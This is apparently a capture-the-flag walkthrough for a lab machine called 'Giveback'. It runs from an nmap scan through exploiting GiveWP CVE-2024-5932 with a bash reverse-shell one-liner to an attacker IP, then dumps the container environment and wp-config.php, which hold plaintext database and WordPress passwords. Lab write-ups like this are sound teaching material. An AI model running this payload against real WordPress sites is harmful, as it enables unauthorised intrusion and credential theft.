
Giveback

NMAP

PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
6443/tcp  filtered sun-sr-https
10250/tcp filtered unknown
13013/tcp filtered unknown
30686/tcp open     unknown
Reading the scan: 6443 and 10250 are the default Kubernetes API-server and kubelet ports, and 30686 falls in the NodePort range (30000-32767), so the target is most likely a Kubernetes node with the control-plane ports filtered from this vantage point (the 10.43.0.0/16 service addresses seen later in the container are consistent with k3s, but that is an inference). Only 22/tcp and the website on 80/tcp are directly reachable; 13013 is unidentified and was not pursued.

Foothold

  • the website runs WordPress 6.8.1 (confirmed later by APP_VERSION=6.8.1 in the container environment)
  • it uses the GiveWP plugin for the donation forms — fingerprint the plugin version (readme.txt or plugin asset URLs) before relying on either CVE below
  • it is a donation site; the homepage carries this notice, which already hints at the Kubernetes deployment behind it:
    Team, as u know, we’re going to start this NFP soon.
    But we need to make it scalable and we need to use ‘new technologies’ – while saying goodbye to licensing that we can no longer afford.
    
    Once we have proper funding we’ll move out into EKS.
    
    Stay clean, stay focused-
    
    -babywyrm
    
  • CVE-2024-5932 (GiveWP unauthenticated PHP object injection via the public donation form, leading to RCE; patched in 3.14.2) and CVE-2024-8353 (a bypass of that fix, patched in 3.16.2). Both are unauthenticated and reachable through the donation form, so no credentials are needed for the foothold; which one applies depends on the installed plugin version.
  • start a listener on the attacking host (`nc -lvnp 1337`); the 10.10.14.67 in the payload below is the attacker's VPN address and must be replaced with yours
  • givewp/bin/python CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.67/1337 0>&1'"

  • the reverse shell lands inside a container: `env` shows KUBERNETES_SERVICE_HOST=10.43.0.1, a pod-style HOSTNAME (beta-vino-wp-wordpress-bcfdc9c79-2mh5q) and Kubernetes service-discovery variables. Notable leakage in the environment: the database password and the WordPress admin password in plaintext, the MariaDB service address (10.43.147.82:3306), and an additional internal service, LEGACY_INTRANET_SERVICE at 10.43.2.241:5000, which is the obvious next pivot. The empty WORDPRESS_*_KEY/_SALT variables mean the image generated its own keys (check wp-config.php for the real values), and ALLOW_EMPTY_PASSWORD=yes and WORDPRESS_ENABLE_DATABASE_SSL=no are configuration weaknesses worth recording.

    BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
    WEB_SERVER_HTTP_PORT_NUMBER=8080
    WORDPRESS_RESET_DATA_PERMISSIONS=no
    KUBERNETES_SERVICE_PORT=443
    WORDPRESS_EMAIL=user@example.com
    WP_CLI_CONF_FILE=/opt/bitnami/wp-cli/conf/wp-cli.yml
    WORDPRESS_DATABASE_HOST=beta-vino-wp-mariadb
    MARIADB_PORT_NUMBER=3306
    MODULE=wordpress
    WORDPRESS_SMTP_FROM_NAME=FirstName LastName
    HOSTNAME=beta-vino-wp-wordpress-bcfdc9c79-2mh5q
    WORDPRESS_SMTP_PORT_NUMBER=
    BETA_VINO_WP_MARIADB_PORT_3306_TCP_PROTO=tcp
    WORDPRESS_EXTRA_CLI_ARGS=
    APACHE_BASE_DIR=/opt/bitnami/apache
    LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
    APACHE_VHOSTS_DIR=/opt/bitnami/apache/conf/vhosts
    WEB_SERVER_DEFAULT_HTTP_PORT_NUMBER=8080
    WP_NGINX_SERVICE_PORT_80_TCP=tcp://10.43.4.242:80
    WORDPRESS_ENABLE_DATABASE_SSL=no
    WP_NGINX_SERVICE_PORT_80_TCP_PROTO=tcp
    APACHE_DAEMON_USER=daemon
    BITNAMI_ROOT_DIR=/opt/bitnami
    LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
    WORDPRESS_BASE_DIR=/opt/bitnami/wordpress
    WORDPRESS_SCHEME=http
    WORDPRESS_LOGGED_IN_SALT=
    BETA_VINO_WP_WORDPRESS_PORT_80_TCP=tcp://10.43.61.204:80
    WORDPRESS_DATA_TO_PERSIST=wp-config.php wp-content
    WORDPRESS_HTACCESS_OVERRIDE_NONE=no
    WORDPRESS_DATABASE_SSL_CERT_FILE=
    APACHE_HTTPS_PORT_NUMBER=8443
    PWD=/opt/bitnami/wordpress
    OS_FLAVOUR=debian-12
    WORDPRESS_SMTP_PROTOCOL=
    WORDPRESS_CONF_FILE=/opt/bitnami/wordpress/wp-config.php
    LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
    WP_CLI_BASE_DIR=/opt/bitnami/wp-cli
    WORDPRESS_VOLUME_DIR=/bitnami/wordpress
    WP_CLI_CONF_DIR=/opt/bitnami/wp-cli/conf
    APACHE_BIN_DIR=/opt/bitnami/apache/bin
    BETA_VINO_WP_MARIADB_SERVICE_PORT_MYSQL=3306
    WORDPRESS_PLUGINS=none
    WORDPRESS_FIRST_NAME=FirstName
    MARIADB_HOST=beta-vino-wp-mariadb
    WORDPRESS_EXTRA_WP_CONFIG_CONTENT=
    WORDPRESS_MULTISITE_ENABLE_NIP_IO_REDIRECTION=no
    WORDPRESS_DATABASE_USER=bn_wordpress
    PHP_DEFAULT_UPLOAD_MAX_FILESIZE=80M
    WORDPRESS_AUTH_KEY=
    BETA_VINO_WP_MARIADB_PORT_3306_TCP=tcp://10.43.147.82:3306
    WORDPRESS_MULTISITE_NETWORK_TYPE=subdomain
    APACHE_DEFAULT_CONF_DIR=/opt/bitnami/apache/conf.default
    WORDPRESS_MULTISITE_NETWORK_TYPE=subdomain
    APACHE_DEFAULT_CONF_DIR=/opt/bitnami/apache/conf.default
    WORDPRESS_DATABASE_SSL_KEY_FILE=
    WORDPRESS_LOGGED_IN_KEY=
    APACHE_CONF_DIR=/opt/bitnami/apache/conf
    HOME=/
    KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
    WEB_SERVER_DAEMON_GROUP=daemon
    PHP_DEFAULT_POST_MAX_SIZE=80M
    WORDPRESS_ENABLE_HTTPS=no
    BETA_VINO_WP_WORDPRESS_SERVICE_PORT=80
    BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTPS=443
    WORDPRESS_TABLE_PREFIX=wp_
    WORDPRESS_DATABASE_PORT_NUMBER=3306
    WORDPRESS_DATABASE_NAME=bitnami_wordpress
    LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000
    APACHE_HTTP_PORT_NUMBER=8080
    WP_NGINX_SERVICE_SERVICE_HOST=10.43.4.242
    WP_NGINX_SERVICE_PORT=tcp://10.43.4.242:80
    WP_CLI_DAEMON_GROUP=daemon
    APACHE_DEFAULT_HTTP_PORT_NUMBER=8080
    BETA_VINO_WP_MARIADB_PORT=tcp://10.43.147.82:3306
    WORDPRESS_MULTISITE_FILEUPLOAD_MAXK=81920
    WORDPRESS_AUTO_UPDATE_LEVEL=none
    BITNAMI_DEBUG=false
    LEGACY_INTRANET_SERVICE_SERVICE_PORT=5000
    LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
    WORDPRESS_USERNAME=user
    BETA_VINO_WP_WORDPRESS_PORT=tcp://10.43.61.204:80
    WORDPRESS_ENABLE_XML_RPC=no
    WORDPRESS_BLOG_NAME=User's Blog!
    WP_NGINX_SERVICE_PORT_80_TCP_ADDR=10.43.4.242
    APACHE_PID_FILE=/opt/bitnami/apache/var/run/httpd.pid
    WORDPRESS_AUTH_SALT=
    APACHE_LOGS_DIR=/opt/bitnami/apache/logs
    WORDPRESS_EXTRA_INSTALL_ARGS=
    BETA_VINO_WP_MARIADB_PORT_3306_TCP_PORT=3306
    APACHE_DAEMON_GROUP=daemon
    WORDPRESS_NONCE_KEY=
    WEB_SERVER_HTTPS_PORT_NUMBER=8443
    WORDPRESS_SMTP_HOST=
    WP_NGINX_SERVICE_SERVICE_PORT_HTTP=80
    WORDPRESS_NONCE_SALT=
    APACHE_DEFAULT_HTTPS_PORT_NUMBER=8443
    APACHE_CONF_FILE=/opt/bitnami/apache/conf/httpd.conf
    WORDPRESS_MULTISITE_EXTERNAL_HTTP_PORT_NUMBER=80
    BETA_VINO_WP_WORDPRESS_PORT_443_TCP=tcp://10.43.61.204:443
    WEB_SERVER_DEFAULT_HTTPS_PORT_NUMBER=8443
    WP_NGINX_SERVICE_SERVICE_PORT=80
    WORDPRESS_LAST_NAME=LastName
    WP_NGINX_SERVICE_PORT_80_TCP_PORT=80
    WORDPRESS_ENABLE_MULTISITE=no
    WORDPRESS_SKIP_BOOTSTRAP=no
    BITNAMI_VOLUME_DIR=/bitnami
    BETA_VINO_WP_MARIADB_PORT_3306_TCP_ADDR=10.43.147.82
    BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PORT=80
    KUBERNETES_PORT_443_TCP_PROTO=tcp
    BITNAMI_APP_NAME=wordpress
    WORDPRESS_DATABASE_PASSWORD=sW5sp4spa3u7RLyetrekE4oS
    APACHE_HTDOCS_DIR=/opt/bitnami/apache/htdocs
    BETA_VINO_WP_WORDPRESS_SERVICE_HOST=10.43.61.204
    WEB_SERVER_GROUP=daemon
    WORDPRESS_PASSWORD=O8F7KR5zGi
    KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1
    APACHE_HTACCESS_DIR=/opt/bitnami/apache/conf/vhosts/htaccess
    WORDPRESS_DEFAULT_DATABASE_HOST=mariadb
    WORDPRESS_SECURE_AUTH_KEY=
    BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PROTO=tcp
    APACHE_TMP_DIR=/opt/bitnami/apache/var/run
    APP_VERSION=6.8.1
    BETA_VINO_WP_WORDPRESS_PORT_443_TCP_ADDR=10.43.61.204
    ALLOW_EMPTY_PASSWORD=yes
    WP_CLI_DAEMON_USER=daemon
    BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTP=80
    KUBERNETES_SERVICE_HOST=10.43.0.1
    KUBERNETES_PORT=tcp://10.43.0.1:443
    KUBERNETES_PORT_443_TCP_PORT=443
    WP_CLI_BIN_DIR=/opt/bitnami/wp-cli/bin
    WORDPRESS_VERIFY_DATABASE_SSL=yes
    OS_NAME=linux
    BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PROTO=tcp
    APACHE_SERVER_TOKENS=Prod
    PATH=/opt/bitnami/apache/bin:/opt/bitnami/common/bin:/opt/bitnami/common/bin:/opt/bitnami/mysql/bin:/opt/bitnami/common/bin:/opt/bitnami/php/bin:/opt/bitnami/php/sbin:/opt/bitnami/apache/bin:/opt/bitnami/mysql/bin:/opt/bitnami/wp-cli/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
    WORDPRESS_ENABLE_HTACCESS_PERSISTENCE=no
    WORDPRESS_ENABLE_REVERSE_PROXY=no
    LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
    WORDPRESS_SMTP_USER=
    WEB_SERVER_TYPE=apache
    WORDPRESS_MULTISITE_HOST=
    PHP_DEFAULT_MEMORY_LIMIT=512M
    WORDPRESS_OVERRIDE_DATABASE_SETTINGS=no
    WORDPRESS_DATABASE_SSL_CA_FILE=
    WEB_SERVER_DAEMON_USER=daemon
    OS_ARCH=amd64
    BETA_VINO_WP_WORDPRESS_PORT_80_TCP_ADDR=10.43.61.204
    BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82
    _=/usr/bin/env
    OLDPWD=/opt/bitnami/wordpress/wp-admin
    

-

mariadb-root - sW5sp4syetre32828383kE4oSI  (source not shown in this dump — presumably the MariaDB root secret; verify before use)
mariadb (bn_wordpress) - sW5sp4spa3u7RLyetrekE4oS  (WORDPRESS_DATABASE_PASSWORD in the env dump and DB_PASSWORD in wp-config.php both end in "...E4oS"; the trailing "I" in the original note does not appear in either source)
wordpress (user "user") - O8F7KR5zGi  (WORDPRESS_PASSWORD; the "I have no name!" fragment is the bash prompt shown because the container UID has no /etc/passwd entry — it is not part of the password)

  • wp-config.php
    // ** Database settings - You can get this info from your web host ** //
    // NOTE(review): every value below is also exported in the pod's environment
    // (WORDPRESS_DATABASE_* variables), so a shell in the container exposes the
    // database credentials twice over; the password is a plaintext literal here.
    /** The name of the database for WordPress */
    define( 'DB_NAME', 'bitnami_wordpress' );
    
    /** Database username */
    define( 'DB_USER', 'bn_wordpress' );
    
    /** Database password */
    // NOTE(review): plaintext credential — rotate after the engagement; a mounted
    // Kubernetes Secret would be preferable to an env var copied into this file.
    define( 'DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS' );
    
    /** Database hostname */
    // Cluster-internal service name (10.43.147.82 in the env dump). Presumably
    // reachable from other pods absent a NetworkPolicy — verify; if so the
    // credential above is a pivot to the database, not just to this site.
    define( 'DB_HOST', 'beta-vino-wp-mariadb:3306' );
    
    /** Database charset to use in creating database tables. */
    // 'utf8' rather than 'utf8mb4' — presumably the Bitnami default; unchanged.
    define( 'DB_CHARSET', 'utf8' );
    
    /** The database collate type. Don't change this if in doubt. */
    define( 'DB_COLLATE', '' );